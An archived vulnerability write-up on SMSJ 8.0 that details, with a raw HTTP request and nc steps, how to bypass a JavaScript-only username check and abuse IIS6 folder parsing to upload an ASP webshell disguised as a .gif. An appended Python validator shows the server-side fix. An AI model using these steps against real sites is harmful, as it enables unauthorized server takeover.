Latest SMSJ Version 8.0 vulnerability - Vulnerability warning - Black Bar Safety Net

2008-03-27T00:00:00
ID MYHACK58:62200818630
Type myhack58
Reporter Anonymous
Modified 2008-03-27T00:00:00

Description

Author: rover

While helping a friend test his site's security, I found it runs SMSJ Version 8.0, a system known as an imitation of Alibaba. After registering an enterprise member and logging into the Manager, I noticed that uploaded pictures are stored under http://www.rover.com/UserDocument/<your registered member account>/picture/. Nothing special by itself, but it reminded me of the old registration trick.

This vulnerability is caused entirely by IIS6: on an IIS6 site, if you create a folder named xx.asp and put an ASP Trojan with a .gif suffix inside it, IIS still executes the file as ASP. Looking at the server, it had to be Win2003, that is, IIS6. So I tried to register a user named rover.asp. Registration filters special characters, but on closer inspection the restriction is only a simple piece of JavaScript. The code is as follows:

function checkdata() {
    if (isNumberString(addform.user.value, "1234567890abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz_") != 1
        || addform.user.value.length < 2
        || addform.user.value.length > 16) {
        alert("User registration error. Possible causes:\n\n· the username must be 2-16 characters: digits, letters or underscore");
        return false;
    }
    // The rest of the function is not shown in the original; isNumberString() returns 1
    // when every character of the value is in the allowed set, so this is the only username check.
}

OK. Capture the packet, then submit it directly with nc, bypassing the client-side check entirely.

Capture content

POST /reg_save.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.rover.com/reg.asp?action=reg
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: www.rover.com
Content-Length: 230
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDASQCACRB=FELPBKLAJDFPOKOPFBDEKGMB; cnzz02=1; rtime=0; ltime=1206546036500; cnzz_eid=96831333-

user=qazxc.asp&pass=1234567&pass1=1234567&ypxxone_id=8&ypxxtwo_id=136&coname=rover&colxr=admin&colxrsex=%CF%C8%C9%FA&addone_id=17&addtwo_id=490&coaddress=xxxxx&cotelq=010&cotel=38476564&mail=icerover@msn.com&vip=3&img.x=58&img.y=17

Send it with nc ip 80 and the registration succeeds. Then rename the ASP Trojan to a .gif suffix and upload it as a picture; it ends up at http://www.rover.com/UserDocument/qazxc.asp/Picture/20080326.gif, and that gives a webshell.

That's all. I've been lazy lately and couldn't be bothered to polish this write-up, so skip over it if you don't feel like reading. PS: the exploit is very simple; I haven't written anything for a long time, so this is just a few words, haha. Also, instead of nc you can submit the registration form from a local copy of the page.
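The root cause is that the 2-16 character allowlist lives only in the browser. The following added example (my own code, not part of SMSJ or this write-up) re-applies that rule on the server side to the captured reg_save.asp body above, and additionally refuses usernames that would turn UserDocument/<user>/ into a directory IIS6 maps to the ASP engine. The field names come from the capture; the extra IIS6 suffixes beyond ".asp" are assumed from IIS6's default script mappings.

```python
# Server-side re-check of the registration rule that SMSJ 8.0 only enforces in the browser.
# Added example, not SMSJ code; form field names are taken from the captured request above.
import re
from urllib.parse import parse_qs

# Same rule the page's checkdata() applies client-side: 2-16 chars of digits, letters, underscore.
USERNAME_RE = re.compile(r"^[0-9A-Za-z_]{2,16}$")

# Directory names IIS6 hands to asp.dll regardless of the file's own extension.
# ".asp" is the one the write-up uses; the others are assumed from IIS6 default mappings.
IIS6_SCRIPT_SUFFIXES = (".asp", ".asa", ".cer", ".cdx")


def is_valid_username(user: str) -> bool:
    """Server-side allowlist; rejects 'qazxc.asp' even when the JS check was bypassed."""
    return bool(USERNAME_RE.fullmatch(user))


def would_make_script_dir(user: str) -> bool:
    """True if UserDocument/<user>/ would be treated by IIS6 as a script directory."""
    return user.lower().endswith(IIS6_SCRIPT_SUFFIXES)


def validate_registration(body: str) -> dict:
    """Parse an x-www-form-urlencoded reg_save.asp body and decide whether to accept it.
    Returns 'ok' plus a list of reasons so the caller can log rejected attempts."""
    fields = parse_qs(body, keep_blank_values=True)
    user = fields.get("user", [""])[0]
    reasons = []
    if not is_valid_username(user):
        reasons.append("username violates 2-16 [0-9A-Za-z_] rule")
    if would_make_script_dir(user):
        reasons.append("username would create an IIS6 script-mapped directory")
    if fields.get("pass", [""])[0] != fields.get("pass1", [""])[0]:
        reasons.append("password confirmation mismatch")
    return {"ok": not reasons, "user": user, "reasons": reasons}


# Constructed samples: the body from the capture above, and a benign registration.
CAPTURED_BODY = ("user=qazxc.asp&pass=1234567&pass1=1234567&ypxxone_id=8&ypxxtwo_id=136"
                 "&coname=rover&colxr=admin&colxrsex=%CF%C8%C9%FA&addone_id=17&addtwo_id=490"
                 "&coaddress=xxxxx&cotelq=010&cotel=38476564&mail=icerover@msn.com&vip=3"
                 "&img.x=58&img.y=17")
BENIGN_BODY = "user=rover_01&pass=1234567&pass1=1234567&coname=rover"

if __name__ == "__main__":
    for body in (CAPTURED_BODY, BENIGN_BODY):
        print(validate_registration(body))
```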